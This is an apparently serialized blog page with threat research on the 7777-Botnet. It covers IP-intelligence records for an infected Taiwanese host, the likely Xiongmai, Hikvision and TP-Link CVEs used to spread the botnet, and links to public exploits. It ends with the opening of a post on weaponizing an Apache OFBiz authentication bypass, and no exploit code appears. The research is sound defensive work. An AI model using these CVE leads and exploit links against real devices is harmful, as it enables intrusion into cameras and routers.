vulnerable\"},\"feed_ids\":[\"876acbdf-ab92-46d7-bfcd-8d11e77baf0c\",\"2025c398-1336-46f7-8ae3-3a0eea75ed61\",\"54dde2a2-54ca-48ce-aa12-8823dc2f82d9\"]}\n",[886,81395,81396,81629],{"__ignoreMap":219},[1373,81397,81398,81400,81402,81404,81406,81408,81410,81413,81415,81417,81419,81421,81423,81425,81428,81430,81432,81434,81436,81438,81440,81442,81444,81446,81448,81450,81452,81455,81457,81459,81461,81463,81465,81467,81469,81472,81474,81476,81478,81480,81482,81484,81486,81489,81491,81493,81495,81497,81499,81501,81503,81506,81508,81510,81512,81514,81516,81518,81520,81523,81525,81527,81529,81531,81533,81536,81538,81540,81542,81545,81547,81550,81552,81554,81556,81558,81560,81562,81564,81567,81569,81571,81573,81575,81577,81579,81581,81583,81585,81587,81589,81591,81593,81595,81597,81599,81601,81603,81605,81607,81609,81611,81613,81615,81617,81619,81621,81624,81626],{"class":1375,"line":1376},[1373,81399,9149],{"class":1383},[1373,81401,183],{"class":9152},[1373,81403,26184],{"class":9155},[1373,81405,183],{"class":9152},[1373,81407,4606],{"class":1383},[1373,81409,183],{"class":9173},[1373,81411,81412],{"class":9176},"1.34.97.9",[1373,81414,183],{"class":9173},[1373,81416,5437],{"class":1383},[1373,81418,183],{"class":9152},[1373,81420,26203],{"class":9155},[1373,81422,183],{"class":9152},[1373,81424,4606],{"class":1383},[1373,81426,81427],{"class":5467},"7777",[1373,81429,5437],{"class":1383},[1373,81431,183],{"class":9152},[1373,81433,26219],{"class":9155},[1373,81435,183],{"class":9152},[1373,81437,4606],{"class":1383},[1373,81439,5971],{"class":7054},[1373,81441,5437],{"class":1383},[1373,81443,183],{"class":9152},[1373,81445,26234],{"class":9155},[1373,81447,183],{"class":9152},[1373,81449,4606],{"class":1383},[1373,81451,183],{"class":9173},[1373,81453,81454],{"class":9176},"2024-01-15T13:08:10.811693",[1373,81456,183],{"class":9173},[1373,81458,5437],{"class":1383},[1373,81460,183],{"class":9152},[1373,81462,26254],{"class":9155},[1373,81464,183],{"class":9152},[1373,81466,4606],{"class":1383},[1373,81468,183],{"class":9173},[1373,81470,81471],{"class":9176},"AS3462",[1373,81473,183],{"class":9173},[1373,81475,5437],{"class":1383},[1373,81477,183],{"class":9152},[1373,81479,26274],{"class":9155},[1373,81481,183],{"class":9152},[1373,81483,4606],{"class":1383},[1373,81485,183],{"class":9173},[1373,81487,81488],{"class":9176},"Taiwan",[1373,81490,183],{"class":9173},[1373,81492,5437],{"class":1383},[1373,81494,183],{"class":9152},[1373,81496,26293],{"class":9155},[1373,81498,183],{"class":9152},[1373,81500,4606],{"class":1383},[1373,81502,183],{"class":9173},[1373,81504,81505],{"class":9176},"TW",[1373,81507,183],{"class":9173},[1373,81509,5437],{"class":1383},[1373,81511,183],{"class":9152},[1373,81513,26312],{"class":9155},[1373,81515,183],{"class":9152},[1373,81517,4606],{"class":1383},[1373,81519,183],{"class":9173},[1373,81521,81522],{"class":9176},"Hsinchu",[1373,81524,183],{"class":9173},[1373,81526,5437],{"class":1383},[1373,81528,183],{"class":9152},[1373,81530,242],{"class":9155},[1373,81532,183],{"class":9152},[1373,81534,81535],{"class":1383},":[],",[1373,81537,183],{"class":9152},[1373,81539,26345],{"class":9155},[1373,81541,183],{"class":9152},[1373,81543,81544],{"class":1383},":[",[1373,81546,183],{"class":9173},[1373,81548,81549],{"class":9176},"7777Botnet",[1373,81551,183],{"class":9173},[1373,81553,27625],{"class":1383},[1373,81555,183],{"class":9152},[1373,81557,26373],{"class":9155},[1373,81559,183],{"class":9152},[1373,81561,81544],{"class":1383},[1373,81563,183],{"class":9173},[1373,81565,81566],{"class":9176},"1-34-97-9.hinet-ip.hinet.net",[1373,81568,183],{"class":9173},[1373,81570,27625],{"class":1383},[1373,81572,183],{"class":9152},[1373,81574,26399],{"class":9155},[1373,81576,183],{"class":9152},[1373,81578,8304],{"class":1383},[1373,81580,183],{"class":9152},[1373,81582,26412],{"class":9165},[1373,81584,183],{"class":9152},[1373,81586,4606],{"class":1383},[1373,81588,183],{"class":9173},[1373,81590,26421],{"class":9176},[1373,81592,183],{"class":9173},[1373,81594,5437],{"class":1383},[1373,81596,183],{"class":9152},[1373,81598,26452],{"class":9165},[1373,81600,183],{"class":9152},[1373,81602,4606],{"class":1383},[1373,81604,183],{"class":9173},[1373,81606,26461],{"class":9176},[1373,81608,183],{"class":9173},[1373,81610,5787],{"class":1383},[1373,81612,183],{"class":9152},[1373,81614,26475],{"class":9155},[1373,81616,183],{"class":9152},[1373,81618,81544],{"class":1383},[1373,81620,183],{"class":9173},[1373,81622,81623],{"class":9176},"e738e65a-6e88-4ad3-a922-55d32e57d4e7",[1373,81625,183],{"class":9173},[1373,81627,81628],{"class":1383},"]}\n",[1373,81630,81631,81633,81635,81637,81639,81641,81643,81645,81647,81649,81651,81653,81655,81657,81660,81662,81664,81666,81668,81670,81672,81674,81676,81678,81680,81682,81684,81687,81689,81691,81693,81695,81697,81699,81701,81703,81705,81707,81709,81711,81713,81715,81717,81719,81721,81723,81725,81727,81729,81731,81733,81735,81737,81739,81741,81743,81745,81747,81749,81751,81753,81755,81757,81759,81761,81763,81765,81768,81770,81772,81774,81777,81779,81781,81783,81786,81788,81790,81792,81794,81796,81798,81800,81803,81805,81807,81809,81812,81814,81816,81818,81821,81823,81825,81827,81829,81831,81833,81835,81837,81839,81841,81843,81845,81847,81849,81851,81853,81855,81857,81859,81861,81863,81865,81867,81869,81871,81873,81875,81877,81879,81881,81883,81885,81887,81889,81891,81894,81896,81898,81900,81903,81905,81907,81909,81912,81914],{"class":1375,"line":220},[1373,81632,9149],{"class":1383},[1373,81634,183],{"class":9152},[1373,81636,26184],{"class":9155},[1373,81638,183],{"class":9152},[1373,81640,4606],{"class":1383},[1373,81642,183],{"class":9173},[1373,81644,81412],{"class":9176},[1373,81646,183],{"class":9173},[1373,81648,5437],{"class":1383},[1373,81650,183],{"class":9152},[1373,81652,26203],{"class":9155},[1373,81654,183],{"class":9152},[1373,81656,4606],{"class":1383},[1373,81658,81659],{"class":5467},"81",[1373,81661,5437],{"class":1383},[1373,81663,183],{"class":9152},[1373,81665,26219],{"class":9155},[1373,81667,183],{"class":9152},[1373,81669,4606],{"class":1383},[1373,81671,5971],{"class":7054},[1373,81673,5437],{"class":1383},[1373,81675,183],{"class":9152},[1373,81677,26234],{"class":9155},[1373,81679,183],{"class":9152},[1373,81681,4606],{"class":1383},[1373,81683,183],{"class":9173},[1373,81685,81686],{"class":9176},"2024-01-14T15:33:16.045105",[1373,81688,183],{"class":9173},[1373,81690,5437],{"class":1383},[1373,81692,183],{"class":9152},[1373,81694,26254],{"class":9155},[1373,81696,183],{"class":9152},[1373,81698,4606],{"class":1383},[1373,81700,183],{"class":9173},[1373,81702,81471],{"class":9176},[1373,81704,183],{"class":9173},[1373,81706,5437],{"class":1383},[1373,81708,183],{"class":9152},[1373,81710,26274],{"class":9155},[1373,81712,183],{"class":9152},[1373,81714,4606],{"class":1383},[1373,81716,183],{"class":9173},[1373,81718,81488],{"class":9176},[1373,81720,183],{"class":9173},[1373,81722,5437],{"class":1383},[1373,81724,183],{"class":9152},[1373,81726,26293],{"class":9155},[1373,81728,183],{"class":9152},[1373,81730,4606],{"class":1383},[1373,81732,183],{"class":9173},[1373,81734,81505],{"class":9176},[1373,81736,183],{"class":9173},[1373,81738,5437],{"class":1383},[1373,81740,183],{"class":9152},[1373,81742,26312],{"class":9155},[1373,81744,183],{"class":9152},[1373,81746,4606],{"class":1383},[1373,81748,183],{"class":9173},[1373,81750,81522],{"class":9176},[1373,81752,183],{"class":9173},[1373,81754,5437],{"class":1383},[1373,81756,183],{"class":9152},[1373,81758,242],{"class":9155},[1373,81760,183],{"class":9152},[1373,81762,81544],{"class":1383},[1373,81764,183],{"class":9173},[1373,81766,81767],{"class":9176},"CVE-2017-7577",[1373,81769,183],{"class":9173},[1373,81771,5437],{"class":1383},[1373,81773,183],{"class":9173},[1373,81775,81776],{"class":9176},"CVE-2018-10088",[1373,81778,183],{"class":9173},[1373,81780,5437],{"class":1383},[1373,81782,183],{"class":9173},[1373,81784,81785],{"class":9176},"CVE-2022-45460",[1373,81787,183],{"class":9173},[1373,81789,27625],{"class":1383},[1373,81791,183],{"class":9152},[1373,81793,26345],{"class":9155},[1373,81795,183],{"class":9152},[1373,81797,81544],{"class":1383},[1373,81799,183],{"class":9173},[1373,81801,81802],{"class":9176},"Xiongmai Path Traversal Credential Leak",[1373,81804,183],{"class":9173},[1373,81806,5437],{"class":1383},[1373,81808,183],{"class":9173},[1373,81810,81811],{"class":9176},"Xiongmai Authentication Buffer Overflow",[1373,81813,183],{"class":9173},[1373,81815,5437],{"class":1383},[1373,81817,183],{"class":9173},[1373,81819,81820],{"class":9176},"Xiongmai URI Buffer Overlow",[1373,81822,183],{"class":9173},[1373,81824,27625],{"class":1383},[1373,81826,183],{"class":9152},[1373,81828,26373],{"class":9155},[1373,81830,183],{"class":9152},[1373,81832,81544],{"class":1383},[1373,81834,183],{"class":9173},[1373,81836,81566],{"class":9176},[1373,81838,183],{"class":9173},[1373,81840,27625],{"class":1383},[1373,81842,183],{"class":9152},[1373,81844,26399],{"class":9155},[1373,81846,183],{"class":9152},[1373,81848,8304],{"class":1383},[1373,81850,183],{"class":9152},[1373,81852,26412],{"class":9165},[1373,81854,183],{"class":9152},[1373,81856,4606],{"class":1383},[1373,81858,183],{"class":9173},[1373,81860,1281],{"class":9176},[1373,81862,183],{"class":9173},[1373,81864,5437],{"class":1383},[1373,81866,183],{"class":9152},[1373,81868,26452],{"class":9165},[1373,81870,183],{"class":9152},[1373,81872,4606],{"class":1383},[1373,81874,183],{"class":9173},[1373,81876,10300],{"class":9176},[1373,81878,183],{"class":9173},[1373,81880,5787],{"class":1383},[1373,81882,183],{"class":9152},[1373,81884,26475],{"class":9155},[1373,81886,183],{"class":9152},[1373,81888,81544],{"class":1383},[1373,81890,183],{"class":9173},[1373,81892,81893],{"class":9176},"876acbdf-ab92-46d7-bfcd-8d11e77baf0c",[1373,81895,183],{"class":9173},[1373,81897,5437],{"class":1383},[1373,81899,183],{"class":9173},[1373,81901,81902],{"class":9176},"2025c398-1336-46f7-8ae3-3a0eea75ed61",[1373,81904,183],{"class":9173},[1373,81906,5437],{"class":1383},[1373,81908,183],{"class":9173},[1373,81910,81911],{"class":9176},"54dde2a2-54ca-48ce-aa12-8823dc2f82d9",[1373,81913,183],{"class":9173},[1373,81915,81628],{"class":1383},[18,81917,81918,81919,4606],{},"For those less inclined to look at JSON, you can also observe the installation on ",[47,81920,41731],{"href":81921,"rel":81922},"https:\u002F\u002Fwww.shodan.io\u002Fhost\u002F1.34.97.9",[51],[18,81924,81925],{},[68,81926],{":width":10862,"alt":81927,"src":81928},"Xiongmai colocated with 7777-Botnet","\u002Fblog\u002Fip-intel-7777-botnet\u002Fxiongmai-co-located.png",[18,81930,81931,81932,1246,81937,81941,81942,81946,81947,1246,81952,1255,81957,81961],{},"As we can see, the botnet is co-located with a Xiongmai NVR\u002FIP camera’s HTTP server. In our IP intelligence JSON, we are able to correlate three known vulnerabilities this server is affected by: CVE-2017-7577, CVE-2018-10088, and CVE-2022-45460. All of these are well-known vulnerabilities with public exploits found in ",[47,81933,81936],{"href":81934,"rel":81935},"https:\u002F\u002Fraw.githubusercontent.com\u002Fthreat9\u002Froutersploit\u002Fmaster\u002Froutersploit\u002Fmodules\u002Fexploits\u002Fcameras\u002Fxiongmai\u002Fuc_httpd_path_traversal.py",[51],"Routersploit",[47,81938,2692],{"href":81939,"rel":81940},"https:\u002F\u002Fwww.exploit-db.com\u002Fexploits\u002F44864",[51],", and on ",[47,81943,2485],{"href":81944,"rel":81945},"https:\u002F\u002Fgithub.com\u002Ftothi\u002Fpwn-hisilicon-dvr\u002Fblob\u002Fmaster\u002Fpwn_hisilicon_dvr.py",[51],". CVE-2018-10888, in particular, is already associated with the ",[47,81948,81951],{"href":81949,"rel":81950},"https:\u002F\u002Fblog.netlab.360.com\u002Fbotnets-never-die-satori-refuses-to-fade-away-en\u002F",[51],"Satori",[47,81953,81956],{"href":81954,"rel":81955},"https:\u002F\u002Fwww.fortinet.com\u002Fblog\u002Fthreat-research\u002Fthe-ghosts-of-mirai",[51],"Hajime",[47,81958,24615],{"href":81959,"rel":81960},"https:\u002F\u002Fcybersecurity.att.com\u002Fblogs\u002Flabs-research\u002Fatt-alien-labs-finds-new-golang-malwarebotenago-targeting-millions-of-routers-and-iot-devices-with-more-than-30-exploits",[51]," botnets.",[18,81963,81964,81965,81972,81973,81978],{},"As we detailed in our November 2022 blog, ",[1131,81966,81967],{},[47,81968,81971],{"href":81969,"rel":81970},"https:\u002F\u002Fvulncheck.com\u002Fblog\u002Fxiongmai-iot-exploitation",[51],"Xiongmai IoT Exploitation",", the volume of devices vulnerable to these CVE is still reasonably high. And while new Xiongmai vulnerabilities have popped up in recent years (e.g. ",[47,81974,81977],{"href":81975,"rel":81976},"https:\u002F\u002Fblog.ret2.me\u002Fpost\u002F2022-01-26-exploiting-xiongmai-dvrs\u002F",[51],"CVE-2022-26259","), the exposed interfaces and lower volume of Xiongmai devices exploited 7777-Botnet suggests older vulnerabilities are being used. As such, it’s entirely reasonable to assume that 7777-Botnet is leveraging one of (if not all), CVE-2017-7577, CVE-2018-10088, and CVE-2022-45460. This isn’t a fact, but a reasonable guess based on the information in front of us.",[993,81980,81982],{"id":81981},"hikvision-infections","Hikvision Infections",[18,81984,81985,81986,81990],{},"A similar pattern we see in our IP intelligence data is 7777-Botnet co-located with Hikvision cameras (and OEM derivatives). The botnet is likely using ",[47,81987,37587],{"href":81988,"rel":81989},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2021-36260",[51]," to infect these targets. This idea is bolstered by the fact that a majority of infected cameras are still using affected versions:",[18,81992,81993],{},[68,81994],{":width":10862,"alt":81995,"src":81996},"Hikvision colocated with 7777-Botnet","\u002Fblog\u002Fip-intel-7777-botnet\u002Fhikvision-co-located.png",[18,81998,81999,82000,82004,82005,82009,82010,82017,82018,982,82022,82026,82027,982,82031,82035],{},"CVE-2021-36260 is a very well-known vulnerability. VulnCheck tracks 23 public exploits for this vulnerability, including a ",[47,82001,32281],{"href":82002,"rel":82003},"https:\u002F\u002Fraw.githubusercontent.com\u002Frapid7\u002Fmetasploit-framework\u002Fmaster\u002Fmodules\u002Fexploits\u002Flinux\u002Fhttp\u002Fhikvision_cve_2021_36260_blind.rb",[51],". The vulnerability is included in CISA’s [Known Exploited Vulnerabilities Catalog](",[47,82006,82007],{"href":82007,"rel":82008},"https:\u002F\u002Fwww.cisa.gov\u002Fknown-exploited-vulnerabilities-catalog)",[51],"; (KEV), and they included it in their ",[1131,82011,82012],{},[47,82013,82016],{"href":82014,"rel":82015},"https:\u002F\u002Fwww.cisa.gov\u002Fnews-events\u002Fcybersecurity-advisories\u002Faa22-279a",[51],"“Top CVEs Actively Exploited By People’s Republic of China State-Sponsored Cyber Actors”"," list.\nCVE-2021-36260 is already associated with botnets ",[47,82019,24620],{"href":82020,"rel":82021},"https:\u002F\u002Fwww.fortinet.com\u002Fblog\u002Fthreat-research\u002Fzerobot-new-go-based-botnet-campaign-targets-multiple-vulnerabilities",[51],[47,82023,24605],{"href":82024,"rel":82025},"https:\u002F\u002Fwww.fortinet.com\u002Fblog\u002Fthreat-research\u002Fmirai-based-botnet-moobot-targets-hikvision-vulnerability",[51]," Finally, CVE-2021-36260 is actively detected in the ",[47,82028,31654],{"href":82029,"rel":82030},"https:\u002F\u002Fdashboard.shadowserver.org\u002Fstatistics\u002Fhoneypot\u002Fmap\u002F?day=2024-01-16&host_type=src&vulnerability=cve-2021-36260",[51],[47,82032,11029],{"href":82033,"rel":82034},"https:\u002F\u002Fviz.greynoise.io\u002Ftag\u002Fhikvision-ip-camera-rce-attempt?days=30",[51]," honeypot networks.",[18,82037,82038],{},[68,82039],{":width":10862,"alt":82040,"src":82041},"Greynoise tag for CVE-2021-36260","\u002Fblog\u002Fip-intel-7777-botnet\u002Fgreynoise-cve-2021-36260.png",[18,82043,82044],{},"Given all that background, it again seems reasonable to theorize that the botnet is spreading to Hikvision cameras using CVE-2021-36260. Even as the vulnerability gets older, there continues to remain thousands of vulnerable targets, appearing to correlate directly with the botnet’s infection rates",[993,82046,82048],{"id":82047},"tp-link-infections","TP-Link Infections",[18,82050,82051,82052,1246,82057,1246,82062,1246,82067,1246,82072,82077],{},"Another set of targets the botnet seems to go after are TP-Link routers. We observe the botnet co-hosted with the web interface for the following models: ",[47,82053,82056],{"href":82054,"rel":82055},"https:\u002F\u002Fwww.tp-link.com\u002Fus\u002Fsupport\u002Fdownload\u002Ftl-wr740n\u002F#Firmware",[51],"WR740N",[47,82058,82061],{"href":82059,"rel":82060},"https:\u002F\u002Fwww.tp-link.com\u002Fin\u002Fsupport\u002Fdownload\u002Ftl-wr840n\u002F#Firmware",[51],"WR840N",[47,82063,82066],{"href":82064,"rel":82065},"https:\u002F\u002Fwww.tp-link.com\u002Fus\u002Fsupport\u002Fdownload\u002Ftl-wr841n\u002F#Firmware",[51],"WR841N",[47,82068,82071],{"href":82069,"rel":82070},"https:\u002F\u002Fwww.tp-link.com\u002Fus\u002Fsupport\u002Fdownload\u002Ftl-wr940n\u002F#Firmware",[51],"WR940N",[47,82073,82076],{"href":82074,"rel":82075},"https:\u002F\u002Fwww.tp-link.com\u002Fus\u002Fsupport\u002Fdownload\u002Ftl-wr941nd\u002F#Firmware",[51],"WR941ND",", and a much smaller subset of Archer infections.",[18,82079,82080],{},[68,82081],{":width":10862,"alt":82082,"src":82083},"TP-Link colocated with 7777-Botnet","\u002Fblog\u002Fip-intel-7777-botnet\u002Ftp-link-co-located.png",[18,82085,82086],{},"The infected routers are all older, having not received any updates since 2022 (and one not receiving an update since 2019). It’s difficult to pin a single vulnerability on this group because TP-Link either creates CVEs with useless descriptions or doesn’t create any at all. Their release notes hardly shed light on the situation either.",[18,82088,82089],{},[68,82090],{":width":10862,"alt":82091,"src":82092},"Useless release notes","\u002Fblog\u002Fip-intel-7777-botnet\u002Ftp-link-release-notes.png",[18,82094,82095,82096,82101,82102,982,82106,59],{},"However, ",[47,82097,82100],{"href":82098,"rel":82099},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2022-24355",[51],"CVE-2022-24355"," seems a reasonable candidate. It doesn’t require authentication, and public exploits have been developed for the ",[47,82103,82071],{"href":82104,"rel":82105},"https:\u002F\u002Fblog.viettelcybersecurity.com\u002Ftp-link-tl-wr940n-httpd-httprpmfs-stack-based-buffer-overflow-remote-code-execution-vulnerability\u002F",[51],[47,82107,82066],{"href":82108,"rel":82109},"https:\u002F\u002Fblog.viettelcybersecurity.com\u002F1day-to-0day-on-tl-link-tl-wr841n\u002F",[51],[18,82111,82112,82113,82118],{},"There are more well-known TP-Link vulnerabilities that affect these models, such as ",[47,82114,82117],{"href":82115,"rel":82116},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002Fcve-2021-41653",[51],"CVE-2021-41653",". But these exploits seem to require valid credentials to exploit the target. It is certainly a possibility that there are routers using default credentials or that 7777-botnet is brute-forcing credentials, but there is no evidence to support that. As such, CVE-2022-24355 seems like the most straightforward possibility - although it is little more than an educated guess.",[993,82120,82122],{"id":82121},"other-infections-and-socks5","Other Infections and SOCKS5",[18,82124,82125],{},"We also see the 7777-Botnet on systems without TP-Link, Xiongmai, or Hikvision present, although at a significantly lower volume (which might indicate these are just honeypots, it’s hard to say). We see the botnet co-located with MVPower (CVE-2016-20016), Zyxel NAS (CVE-2020-9054), and GitLab (CVE-2021-22205).",[18,82127,82128],{},"We also observed that the botnet often spins up a SOCKS5 server on port 11288. We uncovered this, again, by monitoring co-located services. Shodan doesn’t capture this behavior, but our friends over at Censys can visualize it for us.",[18,82130,82131],{},[68,82132],{":width":10862,"alt":82133,"src":82134},"7777-Botnet Socks5 on Censys","\u002Fblog\u002Fip-intel-7777-botnet\u002Fcensys-socks5.png",[18,82136,82137],{},"This is an interesting feature of the botnet that was not described in the original writeup and indicates it might have a larger role in the attacker’s infrastructure.",[61,82139,1903],{"id":1902},[18,82141,82142],{},"The 7777-Botnet is an active botnet, and speculating how it spreads to new systems helps researchers begin to understand how to dismantle the botnet and also provides defenders with actionable steps to defend against infection. Using known vulnerabilities on co-located services, we hypothesize five different CVE that the botnet might be using to spread to TP-Link, Xiongmai, and Hikvision devices, and we suggest a few CVE for more low-volume infections.",[18,82144,82145],{},"While the botnet isn’t well-known, it is easy enough to protect your networks from it.\nEnsure that you isolate infected hosts, remediating the potentially exploited CVE, and validate that no additional infected devices exist in your network. Further, be sure to inventory devices for unnecessary internet exposure, and place them behind appropriate security controls.",[61,82147,82149],{"id":82148},"about-vulncheck-and-ip-intelligence","About VulnCheck and IP Intelligence",[18,82151,82152],{},"This analysis comes out of VulnCheck's IP Intelligence capability, which is now generally available in our Initial Access Intelligence product. Sign up to trial our data by using the Register and Schedule Demo buttons at the top right corner of our website.",[2901,82154,82155],{},"html pre.shiki code .swvn1, html code.shiki .swvn1{--shiki-light:#39ADB5;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .saDeg, html code.shiki .saDeg{--shiki-light:#39ADB5;--shiki-light-font-style:inherit;--shiki-default:#005CC5;--shiki-default-font-style:inherit;--shiki-dark:#79B8FF;--shiki-dark-font-style:inherit;--shiki-sepia:#66D9EF;--shiki-sepia-font-style:italic}html pre.shiki code .sEff5, html code.shiki .sEff5{--shiki-light:#9C3EDA;--shiki-light-font-style:inherit;--shiki-default:#005CC5;--shiki-default-font-style:inherit;--shiki-dark:#79B8FF;--shiki-dark-font-style:inherit;--shiki-sepia:#66D9EF;--shiki-sepia-font-style:italic}html pre.shiki code .sh1VR, html code.shiki .sh1VR{--shiki-light:#39ADB5;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#CFCFC2}html pre.shiki code .sINAO, html code.shiki .sINAO{--shiki-light:#91B859;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#CFCFC2}html pre.shiki code .sYThS, html code.shiki .sYThS{--shiki-light:#F76D47;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .sMTiH, html code.shiki .sMTiH{--shiki-light:#39ADB5;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .s_MOj, html code.shiki .s_MOj{--shiki-light:#E2931D;--shiki-light-font-style:inherit;--shiki-default:#005CC5;--shiki-default-font-style:inherit;--shiki-dark:#79B8FF;--shiki-dark-font-style:inherit;--shiki-sepia:#66D9EF;--shiki-sepia-font-style:italic}html .light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html.light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html .sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html.sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}",{"title":219,"searchDepth":220,"depth":220,"links":82157},[82158,82159,82164,82165],{"id":11647,"depth":220,"text":11648},{"id":81386,"depth":220,"text":81387,"children":82160},[82161,82162,82163],{"id":81981,"depth":1266,"text":81982},{"id":82047,"depth":1266,"text":82048},{"id":82121,"depth":1266,"text":82122},{"id":1902,"depth":220,"text":1903},{"id":82148,"depth":220,"text":82149},"2024-01-18","VulnCheck recently announced an IP Intelligence product that tracks attacker command & control (C2) infrastructure, as well as internet-facing potentially vulnerable systems. Using this data, we’ll explore the vulnerabilities that the 7777-Botnet is likely using to infect new hosts.",{"slug":82169},"ip-intel-7777-botnet","\u002Fblog\u002Fip-intel-7777-botnet",{"title":58279,"description":82167},"blog\u002Fip-intel-7777-botnet",[23275],"x4VlkZDllklyMNN3aRjQwXX2hD4GPhWxV4jiGwz7RDc",{"id":82176,"title":58272,"articles":82177,"authors":82189,"body":82191,"date":82181,"description":83369,"extension":234,"image":7,"link":7,"meta":83370,"navigation":237,"path":83372,"seo":83373,"series":7,"stem":83374,"subtype":7,"tags":83375,"__hash__":83376},"blog\u002Fblog\u002Fofbiz-cve-2023-51467.md",[82178,82182,82186],{"title":82179,"source":14382,"link":82180,"date":82181},"New PoC Exploit for Apache OfBiz Vulnerability Poses Risk to ERP Systems","https:\u002F\u002Fthehackernews.com\u002F2024\u002F01\u002Fnew-poc-exploit-for-apache-ofbiz.html","2024-01-11",{"title":82183,"source":61436,"link":82184,"date":82185},"Risky Biz News: Chinese APT exploits two Pulse Secure zero-days","https:\u002F\u002Friskybiznews.substack.com\u002Fp\u002Fchinese-apt-exploits-pulse-secure-zero-days?utm_source=post-email-title&publication_id=852612&post_id=140591138&utm_campaign=email-post-title&isFreemail=true&r=2rnh0k&utm_medium=email","2024-01-12",{"title":82187,"source":14390,"link":82188,"date":82185},"Researchers published a proof-of-concept (PoC) code for the recently disclosed critical flaw CVE-2023-51467 in the Apache OfBiz.","https:\u002F\u002Fsecurityaffairs.com\u002F157339\u002Fhacking\u002Fapache-ofbiz-poc-exploit.html",[82190],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":82192,"toc":83359},[82193,82196,82198,82217,82221,82224,82230,82233,82239,82267,82271,82291,82297,82316,82320,82331,82337,82357,82366,82413,82416,82458,82461,82465,82509,82516,82552,82566,82626,82635,82639,82659,82670,82673,82813,82821,82834,82987,82990,83294,83300,83306,83309,83312,83318,83321,83323,83334,83336,83356],[263,82194],{":list":82195,"ico":266,"title":58272},"[\"VulnCheck developed and open-sourced a memory-resident payload for Apache OFBiz’s CVE-2023-51467.\",\"The Apache OFBiz Groovy “Sandbox” is trivially bypassable.\",\"There are only hundreds of vulnerable internet-facing Apache OFBiz installations.\"]",[61,82197,11648],{"id":11647},[18,82199,82200,82201,82206,82207,82212,82213,82216],{},"On December 26, ",[47,82202,82205],{"href":82203,"rel":82204},"https:\u002F\u002Fblog.sonicwall.com\u002Fen-us\u002F2023\u002F12\u002Fsonicwall-discovers-critical-apache-ofbiz-zero-day-authbiz\u002F",[51],"SonicWall"," disclosed an authentication bypass affecting Apache OFBiz. SonicWall demonstrated the vulnerability, assigned ",[47,82208,82211],{"href":82209,"rel":82210},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2023-51467",[51],"CVE-2023-51467",", by accessing the protected HTTP endpoint ",[886,82214,82215],{},"\u002Fwebtools\u002Fcontrol\u002Fping"," without authentication. While that proved the vulnerability existed, it did not demonstrate arbitrary code execution. However, CVE-2023-51467 can be used to execute arbitrary code. And even better, it can be used to execute a payload from memory. In this blog, we’ll demonstrate how we weaponized Apache OFBiz CVE-2023-51467.",[61,82218,82220],{"id":82219},"does-ofbiz-matter","Does OFBiz Matter?",[18,82222,82223],{},"Apache OFBiz is not hugely popular software. There are approximately 500-1000 internet-facing targets at any given time. A naive search on Shodan indicates there are more than 10,000 targets.",[18,82225,82226],{},[68,82227],{":width":10862,"alt":82228,"src":82229},"OFBiz on Shodan","\u002Fblog\u002Fofbiz-cve-2023-51467\u002Fshodan-honeypots.png",[18,82231,82232],{},"But it turns out that almost all of these are honeypots. In fact, looking at Shodan’s trends, we see a huge spike of honeypots in September 2023.",[18,82234,82235],{},[68,82236],{":width":10862,"alt":82237,"src":82238},"OFBiz honeypot trend on Shodan","\u002Fblog\u002Fofbiz-cve-2023-51467\u002Fshodan-ofbiz-trend.png",[18,82240,82241,82242,82246,82247,1255,82252,82257,82258,82262,82263,59],{},"This likely suggests that the software is interesting to defenders and attackers alike. Historically, OFBiz has been an exploitation target. The Syssrv botnet was ",[47,82243,31277],{"href":82244,"rel":82245},"https:\u002F\u002Fcujo.com\u002Fblog\u002Fthe-sysrv-botnet-and-how-it-evolved\u002F",[51]," to exploit ",[47,82248,82251],{"href":82249,"rel":82250},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2020-9496",[51],"CVE-2020-9496",[47,82253,82256],{"href":82254,"rel":82255},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2021-29200",[51],"CVE-2021-29200"," has activity on ",[47,82259,11029],{"href":82260,"rel":82261},"https:\u002F\u002Fviz.greynoise.io\u002Ftag\u002Fapache-ofbiz-deserialization-rce-attempt?days=1",[51],". OFBiz was also one of the first products to have a public Log4Shell 